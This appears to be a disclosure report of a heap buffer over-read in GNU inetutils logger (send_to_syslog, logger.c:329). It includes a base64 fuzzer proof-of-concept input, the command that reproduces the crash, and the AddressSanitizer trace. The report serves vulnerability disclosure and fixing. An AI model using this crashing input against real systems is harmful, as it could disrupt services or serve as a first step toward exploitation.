# Heap-based Buffer Overflow in logger ## Description
Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329 **version** ``` ./logger --version logger (GNU inetutils) 2.2.16-cf091 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later < https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Written by Sergey Poznyakoff. ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **poc** ``` base64 poc ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE hHY= ``` **command** ``` ./logger -s < ./poc ``` **Result** ``` ./logger -s < ./poc e�g�rrrc#ccOrrc#ccO ================================================================= ==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248 READ of size 1 at 0x60c00000003f thread T0 #0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 #1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2 #2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d) 0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8) allocated by thread T0 here: #0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad) #1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27 #2 0x8000000000000005 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog Shadow bytes around the buggy address: 0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00 0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4156==ABORTING ```
